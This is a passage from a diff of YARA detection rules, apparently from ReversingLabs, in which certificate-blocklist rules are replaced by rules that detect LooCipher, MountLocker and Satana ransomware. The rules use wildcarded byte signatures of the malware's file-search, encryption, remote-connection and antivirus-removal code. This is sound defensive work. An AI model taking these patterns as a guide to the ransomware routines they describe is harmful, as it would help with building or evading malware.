+            4D ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 52 FF
+            15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 0D ?? ?? ?? ?? 51 8D 95 ??
+            ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 6A ?? 8D 85
+            ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 6A ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ??
+            ?? 85 C0 75 ?? 33 C0 E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 6A ??
+            68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ?? ??
+            ?? 85 C0 75 ?? 33 C0 E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
+            ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 C0 E9 ?? ?? ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 6A ?? 8B
+            8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 C0 E9 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? BA ?? ?? ?? ?? 85 D2 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8B 8D
+            ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 6A ?? 6A ?? E8 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 50
+            68 ?? ?? ?? ?? 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 6A ?? 6A ?? E8 ?? ??
+            ?? ?? 50 8B 15 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 C0 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B
+            E5 5D C2
+        }
+		$encrypt_files_p3 = {
+            55 8B EC 83 EC ?? 6A ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B
+            4D ?? 51 8D 55 ?? 52 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75
+            ?? FF 15 ?? ?? ?? ?? 33 C0 EB ?? 8B 4D ?? 51 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4
+            ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8D 4D ??
+            51 8B 55 ?? 52 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ??
+            ?? ?? ?? 33 C0 EB ?? 8B 4D ?? 8B 55 ?? 89 11 33 C0 8B E5 5D C3
+        }
+		$find_files = {
+            8D 95 ?? ?? ?? ?? 52 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52
+            8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ??
+            8D 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD
+            ?? ?? ?? ?? ?? 75 ?? EB ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85
+            C0 76 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 6A ?? 68
+            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ??
+            89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
+            ?? 6A ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ??
+            51 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 8B 85 ?? ??
+            ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 E8
+        }
+		$uninstall_eset_av = {
+            8D 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 86 ?? ?? ?? ?? 8D 4D ?? 51 68 ?? ?? ?? ?? 8D
+            95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 68 ??
+            ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 8D ??
+            ?? ?? ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 7D ?? 68 ?? ?? ??
+            ?? 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ??
+            ?? ?? 6A ?? 6A ?? 6A ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
+            FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 6A
+            ?? 6A ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THRANE AGENTUR ApS" and ( pe.signatures [ i ] . serial == "00:ec:e6:cb:f6:7d:c4:16:35:a5:e5:d0:75:f2:86:af:23" or pe.signatures [ i ] . serial == "ec:e6:cb:f6:7d:c4:16:35:a5:e5:d0:75:f2:86:af:23" ) and 1603369254 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $uninstall_eset_av )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_014A98D697B44F43Ded21F18Eb6Ad0Ba : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Loocipher : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects LooCipher ransomware."
 		author = "ReversingLabs"
-		id = "4fcd4e89-658c-593b-8f94-edd5df19da6e"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "b5aa2bd0-72b0-5013-a60e-9b4f1ee1de1f"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6388-L6404"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "9f1cc61b944974696113912bc1d1a0b45b9911fa4d6de382a48c0d22d2d20953"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.LooCipher.yara#L1-L87"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "aa0598d63b5fad6aea0945a0aa2030d3d6e2cd9f1fea16f3dd17cdceb68323e3"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "LooCipher"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$remote_connection = {
+            6A ?? 83 EC ?? 8B CC 89 A5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 B9 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
+            50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 68 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 85 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50
+            8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
+            83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? E8
+        }
+		$encrypt_files = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? 53 56 57 8D BD
+            ?? ?? ?? ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? F3 AB A1 ?? ?? ?? ?? 33 C5 89 45 ?? 50 8D
+            45 ?? 64 A3 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 0F B7 4D ?? 3B C1 74
+            ?? E8 ?? ?? ?? ?? 8B F0 8D 4D ?? E8 ?? ?? ?? ?? 8B C8 83 E9 ?? 8B C6 33 D2 F7 F1 89
+            55 ?? 6A ?? 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ??
+            ?? 8B 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 50 8D 4D ?? E8
+            ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 8D 45 ?? 50 8B 4D ??
+            E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C9 ?? 89 8D ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 52 8B CD 50 8D 15
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 5A 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ??
+            33 CD E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 3B EC E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$find_files = {
+            52 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? B9
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 C0 85 C0 0F 84 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8B F4 89
+            A5 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 50 ?? 52 8B 00 50 8B CE E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C6 45 ?? ?? B9
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 6A ?? 8D 8D ?? ?? ?? ?? 51 C6 45 ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 89 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50
+            B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            68 ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? EB ?? 83 EC ?? 8B CC
+            89 A5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? B9 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52
+            B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 8D
+            ?? ?? ?? ?? 89 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 B9 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? EB
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hillcoe Software Inc." and pe.signatures [ i ] . serial == "01:4a:98:d6:97:b4:4f:43:de:d2:1f:18:eb:6a:d0:ba" and 1605364760 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $remote_connection )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_063A7D09107Eddd8Aa1F733634C6591B : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Mountlocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects MountLocker ransomware."
 		author = "ReversingLabs"
-		id = "0169cf47-72b0-53ec-bc8f-c2a80febad3a"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "8ce7e5c4-9eca-5dd2-ab92-39b915900d72"
+		date = "2021-03-25"
+		modified = "2021-03-25"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6406-L6422"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "19f11e1d9ce95eb4bc75387a0118c230388a13cd07b02e00ea1d65cdcc0b2bd7"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.MountLocker.yara#L1-L86"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d203217c229d54802e96e19dc66d38ecb0443d19e0492efe337df471a99559dc"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "MountLocker"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            55 8B EC 83 E4 ?? 83 EC ?? 53 56 57 8B 3D ?? ?? ?? ?? 8B DA 8B F1 FF D7 89 44 24 ??
+            33 C0 50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? 56 89 54 24 ?? 89 44 24 ?? FF 15
+            ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? 51 50 FF 15 ?? ?? ??
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? FF 74 24 ?? FF 74 24 ?? 6A ?? 6A ?? FF 74 24 ?? FF
+            15 ?? ?? ?? ?? 89 44 24 ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C9 0F 31 89 44 8C ?? 41 83 F9
+            ?? 72 ?? FF 75 ?? 8B D3 8D 4C 24 ?? E8 ?? ?? ?? ?? 89 44 24 ?? 59 85 C0 74 ?? 8D 4C
+            24 ?? E8 ?? ?? ?? ?? 89 44 24 ?? 8B 7C 24 ?? 8B 44 24 ?? 89 7C 24 ?? 89 44 24 ?? 8B
+            35 ?? ?? ?? ?? 8B DE 8B 15 ?? ?? ?? ?? 03 DF 8B CA 89 54 24 ?? 13 C8 BF ?? ?? ?? ??
+            8B C6 F0 0F C7 0F 8B 7C 24 ?? 3B C6 8B 44 24 ?? 75 ?? 3B 54 24 ?? 75 ?? FF 74 24 ??
+            8B 35 ?? ?? ?? ?? FF D6 FF 74 24 ?? FF D6 8B 3D ?? ?? ?? ?? FF D7 8B F8 8B C2 2B 7C
+            24 ?? 89 7C 24 ?? 1B 44 24 ?? 89 44 24 ?? 75 ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 35 ?? ??
+            ?? ?? 8B DE 8B 15 ?? ?? ?? ?? 03 DF 8B CA 89 54 24 ?? 13 C8 BF ?? ?? ?? ?? 8B C6 F0
+            0F C7 0F 8B 7C 24 ?? 3B C6 8B 44 24 ?? 75 ?? 3B 54 24 ?? 75 ?? 50 57 FF 74 24 ?? FF
+            74 24 ?? E8 ?? ?? ?? ?? 89 44 24 ?? 8B C2 81 E2 ?? ?? ?? ?? 25 ?? ?? ?? ?? 89 54 24
+            ?? DF 6C 24 ?? 83 64 24 ?? ?? 89 44 24 ?? DF 6C 24 ?? D9 E0 DE C1 D9 5C 24 ?? D9 44
+            24 ?? D9 05 ?? ?? ?? ?? D8 D9 DF E0 F6 C4 ?? 7A ?? D9 1D ?? ?? ?? ?? EB ?? DD D8 8B
+            44 24 ?? EB ?? 8B 44 24 ?? 85 C0 8B 35 ?? ?? ?? ?? 74 ?? 50 FF D6 FF 74 24 ?? FF D6
+            33 C0 5F 5E 5B 8B E5 5D C3
+        }
+		$encrypt_files_p2 = {
+            55 8B EC 83 EC ?? 53 56 57 33 FF 6A ?? 8B F7 5B 0F 31 6A ?? 89 86 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? 83 C6 ?? 3B F3 72 ?? 8B D3 B9 ?? ?? ?? ?? 8A 01 88 41 ?? 41 83 EA ?? 75
+            ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 57 8D 45 ?? 89 5D ?? 50 89 7D ?? 89 7D ?? FF
+            15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 57 57 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 68 ?? ??
+            ?? ?? 57 6A ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? 8B F0 FF 15 ?? ?? ?? ?? 57 FF
+            75 ?? FF 15 ?? ?? ?? ?? 85 F6 74 ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 33 C0 40
+            EB ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F 5E
+            5B 8B E5 5D C3
+        }
+		$find_files_p1 = {
+            53 55 56 8B 74 24 ?? 8B EA 57 8B F9 6A ?? 83 26 ?? 58 66 89 44 6F ?? 8D 5F ?? 33 C0
+            66 89 44 6F ?? 8D 87 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 53 89 44 24 ?? FF D0 33 C9 66 89
+            4C 6F ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 39 4F ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83
+            F8 ?? 0F 85 ?? ?? ?? ?? 8D 46 ?? 50 6A ?? 8D 4E ?? 51 8D 56 ?? 52 8D 46 ?? 50 6A ??
+            6A ?? 8D 5F ?? 53 FF 15 ?? ?? ?? ?? F7 D8 1B C0 83 C0 ?? 89 06 74 ?? 8B CB E8 ?? ??
+            ?? ?? 85 C0 74 ?? 6A ?? 58 66 89 44 6F ?? 33 C0 66 89 44 6F ?? 8D 87 ?? ?? ?? ?? 50
+            53 FF 54 24 ?? 33 C9 66 89 4C 6F ?? 83 F8 ?? 75 ?? 39 0E 74 ?? 51 FF 76 ?? FF 76 ??
+            FF 76 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 83 3E ?? 74 ?? FF 76 ?? FF 15 ?? ?? ?? ??
+            83 26 ?? 83 C8 ?? 5F 5E 5D 5B C3
+        }
+		$find_files_p2 = {
+            55 8B EC 83 E4 ?? 83 EC ?? 53 55 56 8B F1 57 FF 46 ?? 8D 7E ?? 8B 07 8D 5E ?? 89 44
+            24 ?? 8B 46 ?? 53 89 07 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? 89 44 24 ?? 51 8B D0 8B CE E8
+            ?? ?? ?? ?? 8B E8 59 83 FD ?? 75 ?? 33 C0 E9 ?? ?? ?? ?? 53 8D 86 ?? ?? ?? ?? 50 FF
+            15 ?? ?? ?? ?? 8D 9E ?? ?? ?? ?? F6 03 ?? 74 ?? 8B 54 24 ?? 8B CE E8 ?? ?? ?? ?? EB
+            ?? 8D 86 ?? ?? ?? ?? 50 8B 44 24 ?? 05 ?? ?? ?? ?? 8D 04 46 50 FF 15 ?? ?? ?? ?? FF
+            76 ?? 57 6A ?? FF 16 83 C4 ?? 85 C0 74 ?? 53 55 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 55 FF
+            15 ?? ?? ?? ?? 83 7E ?? ?? 8D 5E ?? 74 ?? 83 7C 24 ?? ?? 74 ?? 6A ?? FF 74 24 ?? FF
+            74 24 ?? FF 74 24 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 83 7C 24 ?? ?? 74 ?? FF 74 24
+            ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33 C0 89 0F 40 5F 5E 5D 5B 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Smart Line Logistics" and pe.signatures [ i ] . serial == "06:3a:7d:09:10:7e:dd:d8:aa:1f:73:36:34:c6:59:1b" and 1605712706 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_1E74Cfe7De8C5F57840A61034414Ca9F : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Satana : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Satana ransomware."
 		author = "ReversingLabs"
-		id = "d7fd0c3f-0292-5d27-b8e6-559b829440b4"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "8dc5bf7c-d4cb-5961-804b-035676dacbc0"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6424-L6442"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d82220d908283f1707ec15882503b02cb8dc80095279a9e7d6cbdd113c25d8ae"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Satana.yara#L1-L123"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5deb6ac2e8b64fb6f7af8c41a9b9e695668ca66c96c65f0c7350b11cd4ae0c50"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Satana"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ??
+            ?? 83 EC ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 56 57 89 65 ?? C7 45 ?? ?? ?? ?? ?? 66
+            0F 57 C0 66 0F 13 45 ?? 68 ?? ?? ?? ?? 8B 75 ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 90
+            6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B F8 89
